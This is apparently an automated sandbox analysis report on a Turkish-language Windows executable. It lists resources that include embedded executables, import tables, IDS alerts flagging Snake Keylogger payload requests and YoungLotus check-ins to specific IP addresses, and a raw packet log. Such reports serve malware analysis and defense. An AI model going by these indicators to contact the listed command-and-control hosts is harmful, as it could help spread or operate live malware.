RT_CURSOR | 0xb1298 | 0x134 | data |  |  | 0.36038961038961037
RT_CURSOR | 0xb13cc | 0x134 | data |  |  | 0.4090909090909091
RT_CURSOR | 0xb1500 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" |  |  | 0.4967532467532468
RT_BITMAP | 0xb1634 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.43103448275862066
RT_BITMAP | 0xb1804 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 |  |  | 0.46487603305785125
RT_BITMAP | 0xb19e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.43103448275862066
RT_BITMAP | 0xb1bb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.39870689655172414
RT_BITMAP | 0xb1d88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.4245689655172414
RT_BITMAP | 0xb1f58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.5021551724137931
RT_BITMAP | 0xb2128 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.5064655172413793
RT_BITMAP | 0xb22f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.39655172413793105
RT_BITMAP | 0xb24c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.5344827586206896
RT_BITMAP | 0xb2698 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.39655172413793105
RT_BITMAP | 0xb2868 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 |  |  | 0.4870689655172414
RT_ICON | 0xb2950 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 |  |  | 0.06801125703564728
RT_ICON | 0xb39f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | Turkish | Turkey | 0.2101313320825516
RT_DIALOG | 0xb4aa0 | 0x52 | data |  |  | 0.7682926829268293
RT_STRING | 0xb4af4 | 0x358 | data |  |  | 0.3796728971962617
RT_STRING | 0xb4e4c | 0x428 | data |  |  | 0.37406015037593987
RT_STRING | 0xb5274 | 0x3a4 | data |  |  | 0.40879828326180256
RT_STRING | 0xb5618 | 0x3bc | data |  |  | 0.33472803347280333
RT_STRING | 0xb59d4 | 0x2d4 | data |  |  | 0.4654696132596685
RT_STRING | 0xb5ca8 | 0x334 | data |  |  | 0.42804878048780487
RT_STRING | 0xb5fdc | 0x42c | data |  |  | 0.42602996254681647
RT_STRING | 0xb6408 | 0x1f0 | data |  |  | 0.4213709677419355
RT_STRING | 0xb65f8 | 0x1c0 | data |  |  | 0.44419642857142855
RT_STRING | 0xb67b8 | 0xdc | data |  |  | 0.6
RT_STRING | 0xb6894 | 0x320 | data |  |  | 0.45125
RT_STRING | 0xb6bb4 | 0xd8 | data |  |  | 0.5879629629629629
RT_STRING | 0xb6c8c | 0x118 | data |  |  | 0.5678571428571428
RT_STRING | 0xb6da4 | 0x268 | data |  |  | 0.4707792207792208
RT_STRING | 0xb700c | 0x3f8 | data |  |  | 0.37598425196850394
RT_STRING | 0xb7404 | 0x378 | data |  |  | 0.41103603603603606
RT_STRING | 0xb777c | 0x380 | data |  |  | 0.35379464285714285
RT_STRING | 0xb7afc | 0x374 | data |  |  | 0.4061085972850679
RT_STRING | 0xb7e70 | 0xe0 | data |  |  | 0.5535714285714286
RT_STRING | 0xb7f50 | 0xbc | data |  |  | 0.526595744680851
RT_STRING | 0xb800c | 0x368 | data |  |  | 0.40940366972477066
RT_STRING | 0xb8374 | 0x3fc | data |  |  | 0.34901960784313724
RT_STRING | 0xb8770 | 0x2fc | data |  |  | 0.36649214659685864
RT_STRING | 0xb8a6c | 0x354 | data |  |  | 0.31572769953051644
RT_RCDATA | 0xb8dc0 | 0x44 | data |  |  | 0.8676470588235294
RT_RCDATA | 0xb8e04 | 0x10 | data |  |  | 1.5
RT_RCDATA | 0xb8e14 | 0xc000 | PE32 executable (GUI) Intel 80386, for MS Windows |  |  | 0.43280029296875
RT_RCDATA | 0xc4e14 | 0x3 | ASCII text, with no line terminators | Turkish | Turkey | 3.6666666666666665
RT_RCDATA | 0xc4e18 | 0x3c00 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | Turkish | Turkey | 0.54296875
RT_RCDATA | 0xc8a18 | 0x64c | data |  |  | 0.5998759305210918
RT_RCDATA | 0xc9064 | 0x153 | Delphi compiled form 'TFormVir' |  |  | 0.7522123893805309
RT_RCDATA | 0xc91b8 | 0x47d3 | Microsoft Excel 2007+ | Turkish | Turkey | 0.8675150921846957
RT_GROUP_CURSOR | 0xcd98c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.25
RT_GROUP_CURSOR | 0xcd9a0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.25
RT_GROUP_CURSOR | 0xcd9b4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0xcd9c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0xcd9dc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0xcd9f0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0xcda04 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_ICON | 0xcda18 | 0x14 | data | Turkish | Turkey | 1.1
RT_VERSION | 0xcda2c | 0x304 | data | Turkish | Turkey | 0.42875647668393785
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll | CLSIDFromString
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll | CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
oleaut32.dll | GetErrorInfo, SysFreeString
comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll | ShellExecuteExA, ExtractIconExW
wininet.dll | InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                        shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                        advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                        wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                        netapi32.dllNetbios
Language of compilation system | Country where language is spoken
Turkish | Turkey
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-24T22:11:04.821651+0100 | 2814897 | ETPRO MALWARE W32.YoungLotus Checkin | 1 | 192.168.2.4 | 49733 | 103.36.221.195 | 8790 | TCP
2024-12-24T22:11:10.644957+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.4 | 49740 | 69.42.215.252 | 80 | TCP
2024-12-24T22:11:10.645213+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49735 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:10.645236+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49734 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:13.240931+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49745 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:13.244835+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49744 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:17.493276+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49759 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:17.493467+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49758 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:20.152684+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49764 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:20.259535+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49765 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:24.300966+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49781 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:24.305134+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49780 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:26.893764+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49784 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:27.019999+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49787 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:29.925816+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49796 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:29.934623+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49797 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:34.016732+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49808 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:34.030277+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49807 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:36.619576+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49812 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:36.734168+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49815 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:39.633528+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49823 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:39.644248+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49822 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:42.368794+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49829 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:42.374305+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49827 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:45.332367+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49838 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:45.338699+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49839 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:48.095679+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49841 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:48.107763+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49843 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:51.050695+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49853 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:51.061874+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49852 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:55.170346+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49861 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:55.244824+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49862 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:59.059409+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49873 | 142.250.181.14 | 443 | TCP
2024-12-24T22:11:59.183233+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49872 | 142.250.181.14 | 443 | TCP
2024-12-24T22:12:01.663647+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49876 | 142.250.181.14 | 443 | TCP
2024-12-24T22:12:01.801209+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49879 | 142.250.181.14 | 443 | TCP
2024-12-24T22:12:04.793241+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49888 | 142.250.181.14 | 443 | TCP
2024-12-24T22:12:04.801184+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49889 | 142.250.181.14 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Dec 24, 2024 22:11:13.496088028 CET44349747142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:13.496211052 CET49747443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:13.496221066 CET44349747142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:13.496285915 CET44349747142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:13.496316910 CET49747443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:13.496750116 CET49746443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:13.496761084 CET44349746142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:13.496797085 CET49747443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:13.497342110 CET49747443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:13.497343063 CET49753443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:13.497354031 CET44349747142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:13.497369051 CET44349753142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:13.497843981 CET49753443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:13.498044014 CET49754443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:13.498086929 CET44349754142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:13.498162985 CET49754443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:13.498193979 CET49753443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:13.498204947 CET44349753142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:13.498420000 CET49754443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:13.498440027 CET44349754142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:14.706065893 CET49751443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:14.706084013 CET49752443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:14.706114054 CET49753443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:14.706152916 CET49754443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:14.707767963 CET49758443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:14.707833052 CET44349758142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:14.707963943 CET49758443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:14.708385944 CET49758443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:14.708420992 CET44349758142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:14.709254980 CET49759443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:14.709300995 CET44349759142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:14.709373951 CET49759443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:14.709650993 CET49759443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:14.709665060 CET44349759142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:16.400182962 CET44349758142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:16.400263071 CET49758443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:16.400826931 CET44349758142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:16.400877953 CET49758443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:16.402568102 CET44349759142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:16.402630091 CET49759443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:16.403213978 CET44349759142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:16.403268099 CET49759443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:16.409985065 CET49758443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:16.410006046 CET44349758142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:16.410121918 CET49759443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:16.410132885 CET44349759142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:16.410231113 CET44349758142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:16.410288095 CET49758443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:16.410360098 CET44349759142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:16.410398006 CET49759443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:16.410617113 CET49758443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:16.410768986 CET49759443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:16.451335907 CET44349759142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:16.451365948 CET44349758142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.493313074 CET44349759142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.493377924 CET44349759142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.493407965 CET49759443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.493427992 CET49759443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.493500948 CET44349758142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.493558884 CET49758443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.493586063 CET44349758142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.493608952 CET44349758142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.493638039 CET49758443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.493665934 CET49758443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.495901108 CET49759443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.495919943 CET44349759142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.496891975 CET49764443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.496920109 CET44349764142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.496984959 CET49764443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.496992111 CET49758443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.497041941 CET44349758142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.497072935 CET49758443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.497095108 CET49758443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.497629881 CET49765443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.497667074 CET44349765142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.497725010 CET49765443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.502692938 CET49764443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.502707005 CET44349764142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.503187895 CET49765443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:17.503201962 CET44349765142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.506887913 CET49766443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:17.506896973 CET44349766142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.506944895 CET49766443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:17.507635117 CET49766443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:17.507643938 CET44349766142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.514482975 CET49767443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:17.514491081 CET44349767142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.514542103 CET49767443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:17.515938997 CET49767443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:17.515950918 CET44349767142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:19.242795944 CET44349764142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:19.244147062 CET44349766142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:19.244175911 CET44349767142.250.181.1192.168.2.4
